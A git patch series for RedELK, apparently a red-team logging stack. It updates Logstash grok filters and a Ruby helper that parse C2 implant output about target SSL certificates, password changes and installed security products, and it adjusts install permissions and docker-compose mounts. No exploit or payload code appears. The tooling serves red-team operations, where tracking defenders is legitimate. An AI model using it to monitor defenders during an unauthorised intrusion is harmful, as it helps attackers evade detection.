From 6f98161c8401f22683bebe9328f43e0029a548e3 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Wed, 19 Jan 2022 23:56:47 +0100 Subject: [PATCH 01/18] logstash bluecheck update --- ...ilter-bluecheck_domainchecks_logstash.conf | 79 ++++++++++++++++++- 1 file changed, 78 insertions(+), 1 deletion(-) diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf index 9c2957fe..4294788f 100644 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf +++ b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf @@ -1,13 +1,90 @@ # Part of RedELK # -# In this file we parse the file with the domain classification cheks +# In this file we parse the output of BLUECHECK tools # # Author: Outflank B.V. / Marc Smeets # filter { + ## First we check if we have new fields that are bluecheck related and have the 'type' not set to bluecheck + # + if "BLUECHECK" in [implant][output] { + clone { + clones => [ "bluecheck" ] + remove_field => [ "[c2][log][type]","[infra][log][type]" ] + } + + # check if bluechecktype should be set to sslcert + if "SSL Certicate" in [implant][output] { + mutate { + add_field => { "bluechecktype" => "sslcert"} + } + + # check if bluechecktype should be set to pwchange + if "BLUECHECK Password" in [implant][output] { + mutate { + add_field => { "bluechecktype" => "pwchange"} + } + + # check if bluechecktype should be set to sectools + if "BLUECHECK Security Tools Check" in [implant][output] { + mutate { + add_field => { "bluechecktype" => "sectools"} + } + + + } + + ## Now parse fields with type == bluecheck if [type] == "bluecheck" { + # parse output of sslcert checks + if [bluechecktype] == "sslcert" { + grok { + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK SSL Certificate\: (?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } + } + grok { + match => { "[bluecheck][message]" => "%{URI:[bluecheck][uri]}%{GREEDYDATA} Subject Information:\\n%{GREEDYDATA:[bluecheck][certsubject]}\\n\[\+\] Issuer Information\:\\n%{GREEDYDATA:[bluecheck][certissuer]}\\n" } + } + } + + # parse output of PasswordChangeCheck + if [bluechecktype] == "pwchange" { + grok { + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Password\: (?<[bluecheck][message]>(.|\r|\n)*)\n" } + } + grok { + match => { "[bluecheck][message]" => "(?<[bluecheck][accountname]>(.|\r|\n)*) password last changed at\: (?<[bluecheck][pwchangedate]>%{MONTHNUM}\/%{MONTHDAY}\/%{YEAR} %{HOUR}\:%{MINUTE}\:%{SECOND}), account %{WORD:[bluecheck][accountstate]}." } + } + date { + match => [ "[bluecheck][pwchangedate]", "MM/dd/YYYY HH:mm:ss" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + } + + # parse output of sectools checks + if [bluechecktype] == "sectools" { + grok { + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Security Tools check\:\n(?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } + } + grok { + match => { "[bluecheck][message]" => "\[\+\] Security products found: %{INT:[bluecheck][sectoolsamount]}\\n%{GREEDYDATA:[bluecheck][sectools]}\\n\\n" } + } + # TODO cleanup the list of sectools + #mutate { + # gsub => ["[bluecheck][sectools]]", "\n Product:\t", " -"] + # } + + } + + + + + + # roguedomaincheck is different in the sense that data is read from config file elkserver/mounts/redelk-config/etc/redelk/redteamdomains.conf + # filebeat already sets the type field; there is no event from rtops duplicated. + # parse output of roguedomaincheck if [bluechecktype] == "roguedomaincheck" { grok { match => { "message" => "(?%{YEAR}\/%{MONTHNUM}\/%{MONTHDAY}, %{HOUR}\:%{MINUTE}\:%{SECOND}) Domain\: %{IPORHOST:domain} Source\: %{GREEDYDATA:classifier} Results\: %{GREEDYDATA:results}" } From 18f4baf5974fa07288c634dd88d814b1e7f181dc Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Sat, 22 Jan 2022 15:43:03 +0100 Subject: [PATCH 02/18] bluecheck update sectools update --- ...conf => 80-filter-bluecheck_logstash.conf} | 104 +++++++++++------- .../scripts/bluecheck_make_sectools_object.rb | 22 ++++ 2 files changed, 86 insertions(+), 40 deletions(-) rename elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/{80-filter-bluecheck_domainchecks_logstash.conf => 80-filter-bluecheck_logstash.conf} (55%) create mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/bluecheck_make_sectools_object.rb diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_logstash.conf similarity index 55% rename from elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf rename to elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_logstash.conf index 4294788f..5cf8917e 100644 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf +++ b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/80-filter-bluecheck_logstash.conf @@ -13,75 +13,99 @@ filter { clones => [ "bluecheck" ] remove_field => [ "[c2][log][type]","[infra][log][type]" ] } + } - # check if bluechecktype should be set to sslcert - if "SSL Certicate" in [implant][output] { - mutate { - add_field => { "bluechecktype" => "sslcert"} - } - - # check if bluechecktype should be set to pwchange - if "BLUECHECK Password" in [implant][output] { - mutate { - add_field => { "bluechecktype" => "pwchange"} - } - - # check if bluechecktype should be set to sectools - if "BLUECHECK Security Tools Check" in [implant][output] { - mutate { - add_field => { "bluechecktype" => "sectools"} - } - + ## Now parse only fields with type == bluecheck + ## - } - - ## Now parse fields with type == bluecheck if [type] == "bluecheck" { - + # parse output of sslcert checks - if [bluechecktype] == "sslcert" { + if "BLUECHECK SSL Certificate" in [implant][output] { + # add bluechecktype + mutate { + add_field => { "bluechecktype" => "sslcert"} + } + + # make [bluecheck][message] grok { match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK SSL Certificate\: (?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } } + + # parse [bluecheck][message] grok { - match => { "[bluecheck][message]" => "%{URI:[bluecheck][uri]}%{GREEDYDATA} Subject Information:\\n%{GREEDYDATA:[bluecheck][certsubject]}\\n\[\+\] Issuer Information\:\\n%{GREEDYDATA:[bluecheck][certissuer]}\\n" } + match => { "[bluecheck][message]" => "%{URI:[bluecheck][uri]}%{GREEDYDATA}\n\[\+\] Subject Information\:\n(?<[bluecheck][certsubject]>(.|\r|\n)*)\n\[\+\] Issuer Information\:\n(?<[bluecheck][certissuer]>(.|\r|\n)*)" } + } + + # cleanup the specific fields + mutate { + gsub => ["[bluecheck][certsubject]", "\n", ","] + } + mutate { + gsub => ["[bluecheck][certsubject]", "\r", ""] + } + mutate { + gsub => ["[bluecheck][certissuer]", "\n", ","] + } + mutate { + gsub => ["[bluecheck][certissuer]", "\r", ""] } } # parse output of PasswordChangeCheck - if [bluechecktype] == "pwchange" { + if "BLUECHECK Password" in [implant][output] { + mutate { + add_field => { "bluechecktype" => "pwchange"} + } + grok { - match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Password\: (?<[bluecheck][message]>(.|\r|\n)*)\n" } + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Password\: (?<[bluecheck][message]>(.|\r|\n)*)\n\[\+\] Check Finished" } } + grok { - match => { "[bluecheck][message]" => "(?<[bluecheck][accountname]>(.|\r|\n)*) password last changed at\: (?<[bluecheck][pwchangedate]>%{MONTHNUM}\/%{MONTHDAY}\/%{YEAR} %{HOUR}\:%{MINUTE}\:%{SECOND}), account %{WORD:[bluecheck][accountstate]}." } + match => { "[bluecheck][message]" => "(?<[bluecheck][accountname]>(.|\r|\n)*) password last changed at\: (?<[bluecheck][pwchangedate]>%{MONTHNUM}-%{MONTHDAY}-%{YEAR} %{HOUR}\:%{MINUTE}\:%{SECOND}), %{GREEDYDATA:[bluecheck][accountstate]}." } } + date { - match => [ "[bluecheck][pwchangedate]", "MM/dd/YYYY HH:mm:ss" ] - target => "@timestamp" - timezone => "Etc/UTC" + match => [ "[bluecheck][pwchangedate]", "MM-dd-YYYY HH:mm:ss" ] + target => "[bluecheck][pwchangedate]" } } # parse output of sectools checks - if [bluechecktype] == "sectools" { + if "BLUECHECK Security Tools Check" in [implant][output] { + + mutate { + add_field => { "bluechecktype" => "sectools"} + } + grok { - match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Security Tools check\:\n(?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } + match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Security Tools Check\:\n(?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } } + grok { - match => { "[bluecheck][message]" => "\[\+\] Security products found: %{INT:[bluecheck][sectoolsamount]}\\n%{GREEDYDATA:[bluecheck][sectools]}\\n\\n" } + match => { "[bluecheck][message]" => "\[\+\] Security products found: %{INT:[bluecheck][sectoolsamount]}\n%{GREEDYDATA:[bluecheck][sectools]}\n\n" } } + # TODO cleanup the list of sectools - #mutate { - # gsub => ["[bluecheck][sectools]]", "\n Product:\t", " -"] - # } + mutate { + gsub => ["[bluecheck][sectools]", " ", ""] + } + mutate { + gsub => ["[bluecheck][sectools]", "\t", ""] + } + mutate { + gsub => ["[bluecheck][sectools]", "\n\n", ","] + } + mutate { + gsub => ["[bluecheck][sectools]", "\n", " "] + } + ruby { + path => "/usr/share/logstash/redelk-main/scripts/bluecheck_make_sectools_object.rb" + } } - - - - # roguedomaincheck is different in the sense that data is read from config file elkserver/mounts/redelk-config/etc/redelk/redteamdomains.conf # filebeat already sets the type field; there is no event from rtops duplicated. # parse output of roguedomaincheck diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/bluecheck_make_sectools_object.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/bluecheck_make_sectools_object.rb new file mode 100644 index 00000000..a9071590 --- /dev/null +++ b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/bluecheck_make_sectools_object.rb @@ -0,0 +1,22 @@ +# +# Part of RedELK +# Script to make a json object to be stored as nested object of all found security tools +# +# Author: Outflank B.V. / Marc Smeets +# + +def filter(event) + string = event.get("[bluecheck][sectools]") + string2 = string.gsub("ProcessID","{ \"ProcessID\"") + string3 = string2.gsub(" Vendor",", \"Vendor\"") + string4 = string3.gsub(" Product",", \"Product\"") + string5 = string4.gsub(",{","},{") + string6 = string5.gsub(": ",": \"") + string7 = string6.gsub(", ","\", ") + string8 = string7.gsub("},","\"},") + string9 = "["+string8+"\" }]" + json = JSON.parse(string9) + event.tag("_rubyparseok") + event.set("[bluecheck][sectools]", json) + return [event] +end From 44d61a7a5c1b7c1f80605400d188ed8e8dc33404 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Mon, 24 Jan 2022 15:25:32 +0100 Subject: [PATCH 03/18] permission check on www-data on elkserver --- elkserver/install-elkserver.sh | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/elkserver/install-elkserver.sh b/elkserver/install-elkserver.sh index 74db3f51..cd3e2fc6 100755 --- a/elkserver/install-elkserver.sh +++ b/elkserver/install-elkserver.sh @@ -497,6 +497,13 @@ if [ $ERROR -ne 0 ]; then echo "[X] Could not set permissions on redelk logs (Error Code: $ERROR)." | tee -a $LOGFILE fi +echo "[*] Setting permissions on redelk www data" | tee -a $LOGFILE +chown -R 1000 ./mounts/redelk-www && chmod 664 ./mounts/redelk-www/* >> $LOGFILE 2>&1 +ERROR=$? +if [ $ERROR -ne 0 ]; then + echo "[X] Could not set permissions on redelk www data (Error Code: $ERROR)." | tee -a $LOGFILE +fi + echo "[*] Setting permissions on Jupyter notebook working dir" | tee -a $LOGFILE chown -R 1000 ./mounts/jupyter-workbooks >> $LOGFILE 2>&1 ERROR=$? From 66ebc70cbac6882c5702a417e45dd08ad5e4dc93 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Mon, 24 Jan 2022 22:00:19 +0100 Subject: [PATCH 04/18] Fix for multiple IPs in xforwardedfor --- .../redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf | 2 +- .../redelk-main/conf.d/21-filter-redir-apache_logstash.conf | 2 +- .../redelk-main/conf.d/22-filter-redir-nginx_logstash.conf | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf index c8d2996a..bf27cd94 100644 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf +++ b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf @@ -85,7 +85,7 @@ filter { } else if "request:" in [message] { # Lines with X-Forwarded-For set. We already filtered out the 'xfordwardedfor:-', so anything left with a large enough log line should be good grok { - match => { "messagenosyslog" => [ "GMT:%{HTTPDATE:[redir][timestamp]} frontend:(?<[redir][frontend][name]>([^/]*))/(([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]} headers:\{\|(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } + match => { "messagenosyslog" => [ "GMT:%{HTTPDATE:[redir][timestamp]} frontend:(?<[redir][frontend][name]>([^/]*))/(([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]}(?:, )(?:%{GREEDYDATA:[source][ip_other]}) headers:\{\|(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } add_tag => [ "redirtrafficxforwardedfor" ] } } else { diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf index 90277eb2..a3410d02 100644 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf +++ b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf @@ -36,7 +36,7 @@ filter { } else if "request:" in [message] { # Lines with X-Forwarded-For set. We already filtered out the 'xfordwardedfor:-', so anything left with a large enough log line should be good grok { - match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]} headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } + match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]}(?:, )(?:%{GREEDYDATA:[source][ip_other]}) headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } add_tag => [ "redirtrafficxforwardedfor" ] } } else { diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf index bea598d3..cdf474b1 100644 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf +++ b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf @@ -36,7 +36,7 @@ filter { } else if "request:" in [message] { # Lines with X-Forwarded-For set. We already filtered out the 'xfordwardedfor:-', so anything left with a large enough log line should be good grok { - match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]} headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } + match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]}(?:, )(?:%{GREEDYDATA:[source][ip_other]}) headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } add_tag => [ "redirtrafficxforwardedfor" ] } } else { From 23ec8ef841bc49ac716270b6a49f4a2d7e90767b Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Mon, 24 Jan 2022 22:00:29 +0100 Subject: [PATCH 05/18] typing errors --- .../redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf | 2 +- .../redelk-main/conf.d/21-filter-redir-apache_logstash.conf | 2 +- .../redelk-main/conf.d/22-filter-redir-nginx_logstash.conf | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf index bf27cd94..f7c7f546 100644 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf +++ b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf @@ -1,6 +1,6 @@ # Part of RedELK # -# In this file we configure the logstash filtes for HAproxy logs +# In this file we configure the logstash filters for HAproxy logs # # Author: Outflank B.V. / Marc Smeets # diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf index a3410d02..f194ff18 100644 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf +++ b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf @@ -1,6 +1,6 @@ # Part of RedELK # -# In this file we configure the logstash filtes for Apache logs +# In this file we configure the logstash filters for Apache logs # # Author: Outflank B.V. / Marc Smeets # Contributor: Lorenzo Bernardi diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf index cdf474b1..47f483c1 100644 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf +++ b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf @@ -1,6 +1,6 @@ # Part of RedELK # -# In this file we configure the logstash filtes for Apache logs +# In this file we configure the logstash filters for NGINX logs # # Author: Outflank B.V. / Marc Smeets # Contributor: Lorenzo Bernardi @@ -20,7 +20,7 @@ filter { match => { "message" => [ "\[%{HTTPDATE:[redir][timestamp]}\] (%{NOTSPACE:[host][name]}|-) %{PROG:[process][name]}(?:\[%{POSINT:[process][pid]}\]): %{GREEDYDATA:messagenosyslog}" ] } } - # now matching the real Apache log lines. We have several log line formats we need to match: + # now matching the real log lines. We have several log line formats we need to match: # - Lines without X-Forwarded-For identified with "xforwardedfor:-" # - Lines with X-Forwarded-For set, identified with "xforwardedfor:$SOMEIP" # - any other weird sitution, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size From f1eca3863d97ce45bfe7f000e9856862ef011b47 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Mon, 24 Jan 2022 22:14:49 +0100 Subject: [PATCH 06/18] Modify docker-compose files to live mount logstash conf dirs --- elkserver/redelk-dev.yml | 8 +++----- elkserver/redelk-full.yml | 8 +++----- elkserver/redelk-limited.yml | 8 +++----- 3 files changed, 9 insertions(+), 15 deletions(-) diff --git a/elkserver/redelk-dev.yml b/elkserver/redelk-dev.yml index 05def6e4..797d83aa 100644 --- a/elkserver/redelk-dev.yml +++ b/elkserver/redelk-dev.yml @@ -90,11 +90,9 @@ services: # 2) the certs generated by ES for internal comm between ELK components: CERTS_DIR_LOGSTASH - ./mounts/certs:${CERTS_DIR_LOGSTASH} - ./mounts/redelk-logs:/var/log/redelk - # Uncomment the line below if you want to insert your own logstash config. - # Remember that you need to insert a total set of working configs (inputs, filters and outputs). - # Have a look at docker/redelk-logstash/redelkinstalldata/config/ for working configs - #- ./mounts/logstash-config/config/pipelines.yml:/usr/share/logstash/config/pipelines.yml - #- ./mounts/logstash-config/redelk-main:/usr/share/logstash/redelk-main + # The logstash filter rules are mounted to the filesystem. You can edit them yourself, e.g. add filters for your own C2 + - ./mounts/logstash-config/config/pipelines.yml:/usr/share/logstash/config/pipelines.yml + - ./mounts/logstash-config/redelk-main:/usr/share/logstash/redelk-main environment: - node.name=redelk-logstash - config.reload.automatic:true diff --git a/elkserver/redelk-full.yml b/elkserver/redelk-full.yml index b1461e33..1faafcf8 100644 --- a/elkserver/redelk-full.yml +++ b/elkserver/redelk-full.yml @@ -89,11 +89,9 @@ services: # 2) the certs generated by ES for internal comm between ELK components: CERTS_DIR_LOGSTASH - ./mounts/certs:${CERTS_DIR_LOGSTASH} - ./mounts/redelk-logs:/var/log/redelk - # Uncomment the line below if you want to insert your own logstash config. - # Remember that you need to insert a total set of working configs (inputs, filters and outputs). - # Have a look at docker/redelk-logstash/redelkinstalldata/config/ for working configs - #- ./mounts/logstash-config/config/pipelines.yml:/usr/share/logstash/config/pipelines.yml - #- ./mounts/logstash-config/redelk-main:/usr/share/logstash/redelk-main + # The logstash filter rules are mounted to the filesystem. You can edit them yourself, e.g. add filters for your own C2 + - ./mounts/logstash-config/config/pipelines.yml:/usr/share/logstash/config/pipelines.yml + - ./mounts/logstash-config/redelk-main:/usr/share/logstash/redelk-main environment: - node.name=redelk-logstash - config.reload.automatic:true diff --git a/elkserver/redelk-limited.yml b/elkserver/redelk-limited.yml index 3df63526..682b0294 100644 --- a/elkserver/redelk-limited.yml +++ b/elkserver/redelk-limited.yml @@ -88,11 +88,9 @@ services: # 2) the certs generated by ES for internal comm between ELK components: CERTS_DIR_LOGSTASH - ./mounts/certs:${CERTS_DIR_LOGSTASH} - ./mounts/redelk-logs:/var/log/redelk - # Uncomment the line below if you want to insert your own logstash config. - # Remember that you need to insert a total set of working configs (inputs, filters and outputs). - # Have a look at docker/redelk-logstash/redelkinstalldata/config/ for working configs - #- ./mounts/logstash-config/config/pipelines.yml:/usr/share/logstash/config/pipelines.yml - #- ./mounts/logstash-config/redelk-main:/usr/share/logstash/redelk-main + # The logstash filter rules are mounted to the filesystem. You can edit them yourself, e.g. add filters for your own C2 + - ./mounts/logstash-config/config/pipelines.yml:/usr/share/logstash/config/pipelines.yml + - ./mounts/logstash-config/redelk-main:/usr/share/logstash/redelk-main environment: - node.name=redelk-logstash - config.reload.automatic:true From d868445d1f97200f008c7372cbaa75bf82ddbd85 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Mon, 24 Jan 2022 22:15:16 +0100 Subject: [PATCH 07/18] Remove logstash config files from docker install files --- .../redelkinstalldata/config/pipelines.yml | 6 - .../conf.d/10-input_filebeat_logstash.conf | 17 - .../conf.d/11-input_localfiles_logstash.conf | 15 - .../conf.d/12-input_email_logstash.conf | 80 ---- .../20-filter-redir-haproxy_logstash.conf | 207 --------- .../21-filter-redir-apache_logstash.conf | 159 ------- .../22-filter-redir-nginx_logstash.conf | 158 ------- .../conf.d/30-filter-email_logstash.conf | 18 - .../50-filter-c2-outflankstage1_logstash.conf | 178 -------- .../51-filter-c2-cobaltstrike_logstash.conf | 393 ------------------ .../conf.d/52-filter-c2-poshc2_logstash.conf | 122 ------ .../conf.d/70-filter-pstools_logstash.conf | 63 --- .../conf.d/99-outputs_logstash.conf | 103 ----- .../scripts/cs_makebeaconlogpath.rb | 18 - .../scripts/cs_makedownloadspath.rb | 20 - .../scripts/cs_makekeystrokespath.rb | 20 - .../cs_makekeystrokespath_beforecs4.2.rb | 19 - .../scripts/cs_makescreenshotpath.rb | 21 - .../cs_makescreenshotpath_beforecs4.2.rb | 24 -- .../outflankstage1_makedownloadspath.rb | 19 - .../scripts/outflankstage1_makelogpath.rb | 17 - 21 files changed, 1677 deletions(-) delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/config/pipelines.yml delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/10-input_filebeat_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/11-input_localfiles_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/12-input_email_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/30-filter-email_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/50-filter-c2-outflankstage1_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/51-filter-c2-cobaltstrike_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/52-filter-c2-poshc2_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/70-filter-pstools_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/99-outputs_logstash.conf delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makebeaconlogpath.rb delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makedownloadspath.rb delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makekeystrokespath.rb delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makescreenshotpath.rb delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/outflankstage1_makedownloadspath.rb delete mode 100644 elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/outflankstage1_makelogpath.rb diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/config/pipelines.yml b/elkserver/docker/redelk-logstash/redelkinstalldata/config/pipelines.yml deleted file mode 100644 index 6f34b72a..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/config/pipelines.yml +++ /dev/null @@ -1,6 +0,0 @@ -# This file is where you define your pipelines. You can define multiple. -# For more information on multiple pipelines, see the documentation: -# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html - -- pipeline.id: redelk-pipeline - path.config: "/usr/share/logstash/redelk-main/conf.d" diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/10-input_filebeat_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/10-input_filebeat_logstash.conf deleted file mode 100644 index a2507065..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/10-input_filebeat_logstash.conf +++ /dev/null @@ -1,17 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash inputs -# -# Author: Outflank B.V. / Marc Smeets -# - -input { - beats { - port => 5044 - ssl => true - ssl_certificate => "${CERTS_LOGSTASH_INPUT_CRT}" - ssl_key => "${CERTS_LOGSTASH_INPUT_KEY}" - client_inactivity_timeout => 7200 - ssl_handshake_timeout => 30000 